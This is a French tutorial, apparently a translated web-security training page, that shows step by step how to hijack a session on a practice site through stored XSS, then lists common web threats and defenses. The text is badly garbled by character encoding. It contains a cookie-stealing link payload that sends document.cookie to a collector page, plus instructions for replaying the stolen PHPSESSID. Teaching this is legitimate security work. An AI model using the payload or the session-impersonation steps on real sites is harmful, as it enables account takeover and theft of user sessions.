Comment pirater un site Web ? Techniques courantes de piratage de sites

Techniques de piratage de sites Web

Plus de personnes que jamais ont accรจs ร  Internet. Cela a incitรฉ de nombreuses organisations ร  dรฉvelopper des applications Web que les utilisateurs peuvent utiliser en ligne pour interagir avec l'organisation. Un code mal รฉcrit pour les applications Web peut รชtre exploitรฉ pour obtenir un accรจs non autorisรฉ ร  des donnรฉes sensibles et ร  des serveurs Web.

Dans ce tutoriel, vous apprendrez ร  pirater des sites Web et nous vous prรฉsenterons techniques de piratage d'applications Web et contre-mesures que vous pouvez mettre en place pour vous protรฉger contre de telles attaques.

Comment pirater un site Web

Dans ce scรฉnario pratique de piratage de site Web, nous allons dรฉtourner la session utilisateur de l'application Web situรฉe ร  l'adresse www.techpanda.org. Nous utiliserons des scripts intersites pour lire l'identifiant de session du cookie, puis nous l'utiliserons pour usurper l'identitรฉ d'une session utilisateur lรฉgitime.

L'hypothรจse retenue est que l'attaquant a accรจs ร  l'application Web et qu'il souhaite dรฉtourner les sessions d'autres utilisateurs utilisant la mรชme application. Le but de cette attaque pourrait รชtre d'obtenir un accรจs administrateur ร  l'application Web en supposant que le compte d'accรจs de l'attaquant est limitรฉ.

ร‰tape 1) Ouvrez URL http://www.techpanda.org/.

ร€ des fins pratiques, il est fortement recommandรฉ d'accรฉder ร  l'aide de l'injection SQL. Rรฉfรฉrez-vous ร  ceci article pour plus d'informations sur la faรงon de procรฉder.

ร‰tape 2) Entrez les dรฉtails de connexion.

L'email de connexion est admin@google.com, le mot de passe est Mot de passe2010.

ร‰tape 3) Vรฉrifiez le tableau de bord.

Si vous vous รชtes connectรฉ avec succรจs, vous obtiendrez le tableau de bord suivant

Pirater un site Web

ร‰tape 4) Entrez un nouveau contenu.

Cliquez sur Ajouter un nouveau contact et saisissez ce qui suit comme prรฉnom

<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>

ร‰tape 5) Ajouter Javascript.

Le code ci-dessus utilise Javascรฉnario. Il ajoute un lien hypertexte avec un รฉvรฉnement onclick. Lorsque l'utilisateur sans mรฉfiance clique sur le lien, l'รฉvรฉnement rรฉcupรจre le PHP ID de session de cookie et l'envoie au snatch_sess_id.php la page ainsi que l'identifiant de session dans le URL

Pirater un site Web

ร‰tape 6) Ajouter des dรฉtails.

Entrez les dรฉtails restants comme indiquรฉ ci-dessous et cliquez sur Enregistrer les modifications

Pirater un site Web

ร‰tape 7) Vรฉrifiez le tableau de bord.

Votre tableau de bord ressemblera dรฉsormais ร  l'รฉcran suivant

Pirater un site Web

ร‰tape 8) Vรฉrifiez l'identifiant de la session.

  • ร‰tant donnรฉ que le code du script intersite est stockรฉ dans la base de donnรฉes, il sera chargรฉ ร  chaque fois que les utilisateurs disposant de droits d'accรจs se connecteront.
  • Supposons que l'administrateur se connecte et clique sur le lien hypertexte indiquant Dark.
  • Il/Elle verra apparaรฎtre une fenรชtre avec l'identifiant de session. URL
  • Pirater un site Web

    Note: le script pourrait envoyer la valeur ร  un serveur distant oรน le PHPSESSID est stockรฉ, puis l'utilisateur sera redirigรฉ vers le site Web comme si de rien n'รฉtait.

    Note: la valeur que vous obtenez peut รชtre diffรฉrente de celle de cette page Web tutoriel de piratage, mais le concept est le mรชme

    Usurpation d'identitรฉ de session ร  l'aide Firefox et module complรฉmentaire Tamper Data

    L'organigramme ci-dessous montre les รฉtapes que vous devez suivre pour rรฉaliser cet exercice.

    Usurpation d'identitรฉ de session ร  l'aide Firefox et module complรฉmentaire Tamper Data

    • Tu auras besoin de Firefox navigateur Web pour cette section et module complรฉmentaire Tamper Data
    • Ouvrez Firefox et installez l'ajout comme indiquรฉ dans les schรฉmas ci-dessous

    Usurpation d'identitรฉ de session ร  l'aide Firefox et module complรฉmentaire Tamper Data

    Usurpation d'identitรฉ de session ร  l'aide Firefox et module complรฉmentaire Tamper Data

    • Recherchez les donnรฉes de falsification puis cliquez sur installer comme indiquรฉ ci-dessus

    Usurpation d'identitรฉ de session ร  l'aide Firefox et module complรฉmentaire Tamper Data

    • Cliquez sur Accepter et installerโ€ฆ

    Usurpation d'identitรฉ de session ร  l'aide Firefox et module complรฉmentaire Tamper Data

    Usurpation d'identitรฉ de session ร  l'aide Firefox et module complรฉmentaire Tamper Data

    • Cliquez sur Redรฉmarrer maintenant une fois l'installation terminรฉe
    • Activer la barre de menu dans Firefox s'il n'est pas affichรฉ

    Usurpation d'identitรฉ de session ร  l'aide Firefox et module complรฉmentaire Tamper Data

    • Cliquez sur le menu Outils puis sรฉlectionnez Tamper Data comme indiquรฉ ci-dessous

    Usurpation d'identitรฉ de session ร  l'aide Firefox et module complรฉmentaire Tamper Data

    • Vous obtiendrez la fenรชtre suivante. Remarque : si le Windows n'est pas vide, appuyez sur le bouton Effacer

    Usurpation d'identitรฉ de session ร  l'aide Firefox et module complรฉmentaire Tamper Data

    • Cliquez sur le menu Dรฉmarrer le sabotage
    • Revenir ร  Firefox navigateur Web, tapez http://www.techpanda.org/dashboard.php puis appuyez sur la touche Entrรฉe pour charger la page
    • Vous obtiendrez la fenรชtre contextuelle suivante de Tamper Data

    Usurpation d'identitรฉ de session ร  l'aide Firefox et module complรฉmentaire Tamper Data

    • La fenรชtre contextuelle propose trois (3) options. L'option Tamper vous permet de modifier les informations de l'en-tรชte HTTP avant qu'elles ne soient soumises au serveur.
    • Cliquez sur ce lien
    • Vous obtiendrez la fenรชtre suivante

    Usurpation d'identitรฉ de session ร  l'aide Firefox et module complรฉmentaire Tamper Data

    • Copiez le ID de session PHP vous avez copiรฉ l'attaque URL et collez-le aprรจs le signe รฉgal. Votre valeur devrait maintenant ressembler ร  ceci :
    PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
    • Cliquez sur le bouton OK
    • Vous obtiendrez ร  nouveau la fenรชtre contextuelle des donnรฉes de falsification.

    Usurpation d'identitรฉ de session ร  l'aide Firefox et module complรฉmentaire Tamper Data

    • Dรฉcochez la case qui demande Continuer la falsification ?
    • Cliquez sur le bouton Soumettre lorsque vous avez terminรฉ
    • Vous devriez pouvoir voir le tableau de bord comme indiquรฉ ci-dessous

    Usurpation d'identitรฉ de session ร  l'aide Firefox et module complรฉmentaire Tamper Data

    Note : nous ne nous sommes pas connectรฉs, nous avons usurpรฉ l'identitรฉ d'une session de connexion en utilisant la valeur PHPSESSID que nous avons rรฉcupรฉrรฉe ร  l'aide de scripts intersites

    Qu'est-ce qu'une application Web ? Que sont les menaces Web ?

    Une application Web (alias site Web) est une application basรฉe sur le modรจle client-serveur. Le serveur fournit l'accรจs ร  la base de donnรฉes et la logique mรฉtier. Il est hรฉbergรฉ sur un serveur web. L'application client s'exรฉcute sur le navigateur Web client. Les applications Web sont gรฉnรฉralement รฉcrites dans des langages tels que Java, C# et VB.Net, PHP, ColdFusion Markup Language, etc. les moteurs de base de donnรฉes utilisรฉs dans les applications Web incluent MySQL, MS SQL Server, PostgreSQL, SQLite, etc.

    Principales techniques de piratage de sites Web

    La plupart des applications Web sont hรฉbergรฉes sur des serveurs publics accessibles via Internet. Cela les rend vulnรฉrables aux attaques en raison de leur facilitรฉ dโ€™accรจs. Voici les menaces courantes liรฉes aux applications Web.

    • Injection SQL โ€“ le but de cette menace pourrait รชtre de contourner les algorithmes de connexion, de saboter les donnรฉes, etc.
    • Attaques de dรฉni de serviceโ€“ le but de cette menace pourrait รชtre de refuser aux utilisateurs lรฉgitimes lโ€™accรจs ร  la ressource
    • XSS de scripts intersitesโ€“ le but de cette menace pourrait รชtre dโ€™injecter du code pouvant รชtre exรฉcutรฉ sur le navigateur cรดtรฉ client.
    • Empoisonnement des cookies/sessionsโ€“ le but de cette menace est de modifier les cookies/donnรฉes de session par un attaquant pour obtenir un accรจs non autorisรฉ.
    • Falsification de formulaire โ€“ le but de cette menace est de modifier les donnรฉes des formulaires telles que les prix dans les applications de commerce รฉlectronique afin que l'attaquant puisse obtenir des articles ร  prix rรฉduits.
    • Code Injection โ€“ le but de cette menace est d'injecter du code tel que PHP, Python, etc. qui peuvent รชtre exรฉcutรฉs sur le serveur. Le code peut installer des portes dรฉrobรฉes, rรฉvรฉler des informations sensibles, etc.
    • Defacementโ€“ le but de cette menace est de modifier la page affichรฉe sur un site Web et de rediriger toutes les demandes de page vers une seule page contenant le message de l'attaquant.

    Comment protรฉger votre site Web contre les piratages ?

    Une organisation peut adopter la stratรฉgie suivante pour se protรฉger contre les attaques de serveur Web.

    • Injection SQL โ€“ nettoyer et valider les paramรจtres utilisateur avant de les soumettre ร  la base de donnรฉes pour traitement peut aider ร  rรฉduire les risques d'attaque via Injection SQL. Moteurs de bases de donnรฉes tels que MS SQL Server, MySQL, etc., les paramรจtres de support et les instructions prรฉparรฉes. Elles sont beaucoup plus sรปres que les instructions SQL traditionnelles
    • Attaques par dรฉni de service โ€“ les pare-feu peuvent รชtre utilisรฉs pour supprimer le trafic provenant dโ€™une adresse IP suspecte si lโ€™attaque est un simple DoS. Une configuration appropriรฉe des rรฉseaux et du systรจme de dรฉtection d'intrusion peut รฉgalement contribuer ร  rรฉduire les risques d'intrusion. attaque DoS rรฉussi.
    • Scripts intersites โ€“ validation et nettoyage des en-tรชtes et des paramรจtres transmis via URLLes paramรจtres de formulaire et les valeurs cachรฉes peuvent contribuer ร  rรฉduire les attaques XSS.
    • Empoisonnement des cookies/sessions โ€“ cela peut รชtre รฉvitรฉ en cryptant le contenu des cookies, en รฉteignant les cookies aprรจs un certain temps, en associant les cookies ร  l'adresse IP du client qui a รฉtรฉ utilisรฉe pour les crรฉer.
    • Trempe de forme โ€“ cela peut รชtre รฉvitรฉ en validant et en vรฉrifiant l'entrรฉe de l'utilisateur avant de la traiter.
    • Code Injection โ€“ cela peut รชtre รฉvitรฉ en traitant tous les paramรจtres comme des donnรฉes plutรดt que comme du code exรฉcutable. La dรฉsinfection et la validation peuvent รชtre utilisรฉes pour mettre en ล“uvre cela.
    • Dรฉfiguration โ€“ une bonne politique de sรฉcuritรฉ du dรฉveloppement dโ€™applications Web doit garantir quโ€™elle scelle vulnรฉrabilitรฉs couramment utilisรฉes pour accรฉder au serveur WebCela peut impliquer une configuration appropriรฉe du systรจme d'exploitation, du logiciel serveur web et des bonnes pratiques de sรฉcuritรฉ lors du dรฉveloppement.ping des applications Web.
    Vรฉrifie รงa: 9 Meilleur URL Scanners pour vรฉrifier si un lien est sรปr contre les logiciels malveillants

    Rรฉsumรฉ

    • Une application Web est basรฉe sur le modรจle serveur-client. Le cรดtรฉ client utilise le navigateur Web pour accรฉder aux ressources sur le serveur.
    • Les applications Web sont gรฉnรฉralement accessibles sur Internet. Cela les rend vulnรฉrables aux attaques.
    • Les menaces pesant sur les applications Web incluent l'injection SQL, Code Injection, XSS, dรฉfiguration, empoisonnement aux cookies, etc.
    • Une bonne politique de sรฉcuritรฉ lors du dรฉveloppementping Les applications web peuvent contribuer ร  les sรฉcuriser.

    Rรฉsumez cet article avec :